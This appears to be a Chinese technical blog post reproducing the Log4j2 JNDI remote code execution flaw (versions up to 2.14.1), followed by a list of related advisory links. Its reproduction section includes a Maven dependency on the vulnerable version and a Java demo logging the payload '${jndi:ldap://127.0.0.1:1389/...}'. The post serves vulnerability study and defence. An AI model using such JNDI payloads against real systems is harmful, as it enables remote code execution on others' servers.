Apache Log4j2远程代码执行漏洞
漏洞介绍
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。
此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行
影响版本
Apache Log4j 2.x <= 2.14.1
漏洞复现
在IDEA中新建一个Maven项目,在pom.xml中导入依赖文件下载log4j程序包
pom.xml文件如下:
<dependencies><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-core</artifactId><version>2.14.1</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --><dependency><groupId>org.apache.logging.log4j</groupId><artifactId>log4j-api</artifactId><version>2.14.1</version></dependency></dependencies>
下载相应程序包资源
使用JNDI注入工具开启rmi服务或者idap服务执行本地命令
测试Demo
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;public class Test {private static final Logger logger = LogManager.getLogger(Test.class);public static void main(String[] args) {logger.error("${jndi:ldap://127.0.0.1:1389/2ltqyh}");}
}
Apache Log4j2远程代码执行漏洞相关推荐
- Apache Log4j2远程代码执行漏洞攻击,华为云安全支持检测拦截
近日,华为云安全团队关注到Apache Log4j2 的远程代码执行最新漏洞.Apache Log4j2是一款业界广泛使用的基于Java的日志工具,该组件使用范围广泛,利用门槛低,漏洞危害极大.华为云 ...
- 【紧急】Apache Log4j2 远程代码执行漏洞
0x01 漏洞背景 12月9日,监测到网上披露Apache Log4j2 远程代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特别构造的数据请求包,可 ...
- Apache Log4j2远程代码执行漏洞风险紧急通告,腾讯安全支持全面检测拦截
腾讯安全注意到,一个Apache Log4j2的高危漏洞细节被公开,攻击者利用漏洞可以远程执行代码. 漏洞描述: 腾讯安全注意到,一个Apache Log4j2反序列化远程代码执行漏洞细节已被公开,L ...
- Apache Log4j2 远程代码执行 漏洞
1.漏洞说明 Apache Log4j2是一个基于Java的日志记录工具.该工具重写了Log4j框架,并且引入了大量丰富的特性.该日志框架被大量用于业务系统开发,用来记录日志信息.大多数情况下,开发者 ...
- 分析Apache Log4j2 远程代码执行漏洞
漏洞描述 Log4j是Apache的一个开源项目,通过使用Log4j,可以控制日志信息输送的目的地是控制台.文件.GUI组件,甚至是套接口服务器.NT的事件记录器.UNIX Syslog守护进程等:也 ...
- Apache Log4j2远程代码执行漏洞(CVE-2021-44228)
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apa ...
- 安全漏洞:Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)
阿里云漏洞库 (aliyun.com) 漏洞介绍 解决建议 1.排查应用是否引入了Apache log4j-core Jar包,若存在依赖引入,且在受影响版本范围内,则可能存在漏洞影响.同时为了避免在 ...
- Apache Log4j2 远程代码执行高危漏洞 解决方案
新闻:https://view.inews.qq.com/a/20211210A05KTY00 博主其他文章 Log4j2 高危漏洞分析 简介: Apache Log4j2是一款优秀的Java日志框架 ...
- 快速修复 Log4j2 远程代码执行漏洞步骤
点击关注公众号,实用技术文章及时了解 来源:blog.csdn.net/weixin_48990070/ article/details/121861553 目录 漏洞说明 修复步骤 下载源码zip包 ...
最新文章
- 第十六届全国大学智能车竞赛全国总决赛竞速组别成绩与奖项
- centos 编译 mysql_Centos Mysql 编译安装调试
- 成功解决 ValueError: feature_names mismatch training data did not have the following fields
- 运维前线:一线运维专家的运维方法、技巧与实践导读
- 【渝粤题库】陕西师范大学200481 高级英语(一)
- 【lucene】lucene高亮显示
- Node连接MySQL数据库进行基本的增删改查操作(一看就会)
- C# 索引器的简单例子
- 数据库类型约束自增长
- 计算机网络—数据链路层 网络层 传输层 应用层
- socket创建失败_python3从零学习-5.8.1、socket—底层网络接口
- videojs如何获取请求消息_WEB之基于HTTP协议的几种实时数据获取技术
- 怎么从抖音上直接跳转到微信呢?
- 立创开源 | 基于555定时器的电子琴设计
- bpm导出成html,一种基于BPM系统的EXECL导入免开发生成静态HTML表单的方法与流程...
- 汤姆猫炫跑鸿蒙,汤姆猫炫跑游戏怎么操作-玩法规则一览
- 计算机考研408真题(全国统考2009--2020)、985高校计算机考研资料(清北+北理+北邮+武大+华科+浙大+复旦+哈工大+西安交大+华南理工)、王道四件套、天勤四件套---百度网盘免费下载
- uniapp锚点定位
- c语言程序设计五子棋棋盘怎么画,五子棋的棋盘画不出来,求助!!
- 课设:指纹签到系统-支持PC网页端查看